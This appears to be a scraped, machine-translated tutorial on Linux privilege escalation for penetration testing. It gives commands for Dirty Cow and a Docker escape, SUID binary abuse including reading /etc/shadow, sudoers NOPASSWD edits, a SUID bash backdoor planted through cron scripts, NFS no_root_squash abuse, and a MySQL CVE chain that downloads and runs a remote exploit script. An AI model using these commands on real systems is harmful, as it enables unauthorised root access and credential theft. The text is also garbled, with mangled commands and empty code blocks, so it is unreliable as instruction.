In the process of penetration testing, the promotion of permissions is a very critical step, attackers can often use kernel vulnerabilities/improper permission configuration /root permission running services to find a breakthrough, to achieve the purpose of promoting permissions.
1. Kernel vulnerability entitlement
When it comes to kernel vulnerability rights, we have to mention Dirty Cow, which has existed for the longest time and has the widest impact. Users with low permission can use this vulnerability to realize local rights lifting, and at the same time, they can realize Docker container escape through this vulnerability to obtain shell with root permission.
1.1 Local Kernel Authorization (1) Check the kernel version
Lsb_release -a - uname -aCopy the code
(2) Download, compile and generate exp files
Copy the codebypass@ubuntu:~$ make
bypass@ubuntu:~$
Copy the code
(3) Execute successfully, return a shell with root permission.
1.2 Use the DirtyCow vulnerability to achieve Docker escape
(1) Enter the container, compile the POC and execute:
(2) On the attacker machine, the shell bounced by the host machine is successfully received.
1.3 Linux Right Raising Tool
Github Project address:
https://github.com/mzet-/linux-exploit-suggester.git
Copy the codeCopy the codewget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
Copy the code(1) Automatically search for the corresponding entitlement script based on the operating system version
(2) Download poC as prompted, compile and execute.
2. Use SUID to raise rights
SUID is a special privilege that allows the caller to temporarily obtain the permissions of the file owner during execution. If you can find and run a file with the SUID owned by root, you can get root privileges while running the file. (1) Find the SUID file that can be used to raise rights in Linux
Copy the codefind / -perm -u=s -type f 2>/dev/null
Copy the code
(2) Run the find command as root
Commands that can be used as Linux claim commands and their postures:
Copy the code#Find
find pentestlab -exec whoami \;
#Vim
vim.tiny /etc/shadow
#awk
awk 'BEGIN{system("whoami")}'
#curl
curl file:///etc/shadow
#Bash
bash -p
#Less
less /etc/passwd
#Nmap
nmap --interactive
Copy the code3. SUDO raises rights
Ordinary users execute commands in root mode when using sudo. In many scenarios, for the sake of convenient operation and maintenance management, an error in the sudoer configuration file causes rights to be raised.
(1) Set sudo password free
Copy the code$vi /etc/sudoers Add bypass ALL=(ALL:ALL) NOPASSWD:ALL to the last lineCopy the code(2) Check the permission of sudo
4. Plan tasks
If you can find a scheduled task script that you have permission to modify, you can modify the script to implement the empowerment. In essence, file permissions are incorrectly configured.
(1) View the scheduled task and find the scheduled task script that has the modification permission
Copy the codels -l /etc/cron*
more /etc/crontab
Copy the code
(2) add SUID shell backdoor in mysqlback.sh, when scheduled task is executed as root again, can obtain root permission
Copy the codecp /bin/bash /tmp/shell
chmod u+s /tmp/shell
Copy the code
5. NFS rights raising
If NO_root_squash is enabled on the server and the client uses user root, the client has the root permission for the shared directory. You can use no_root_squash to upgrade the permission.
(1) View the shared directory on the NFS server
Copy the codeSudo showmount -e 10.1.1.233Copy the code
(2) Create a local mount directory and mount the shared directory. Create a Suid shell using the attacker’s local root privileges.
Copy the codeSudo mkdir -p/TMP /data sudo mount -t NFS 10.1.1.233:/home/bypass/TMP /data cp /bin/bash/TMP /data/shell chmod u+s /tmp/data/shellCopy the code
(3) Go back to the server and use -p as a common user to obtain root permission.
6. MySQL raise rights
MySQL has UDF, MOF, write startup, etc., but what is interesting is that cVE-2016-6663, CVE-2016-6664 combination of the extraction scenario, can promote a www-data permission to root.
(1) Use CVE-2016-6663 to upgrade the www-data permission to mysql permission
Copy the codecd /var/www/html/ gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient ./mysql-privesc-race test 123456 localhost testdbCopy the codeMysql > select root from cVE-2016-6664;
Copy the codewget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
chmod 777 mysql-chowned.sh
./mysql-chowned.sh /var/log/mysql/error.log
Copy the codeCopy the code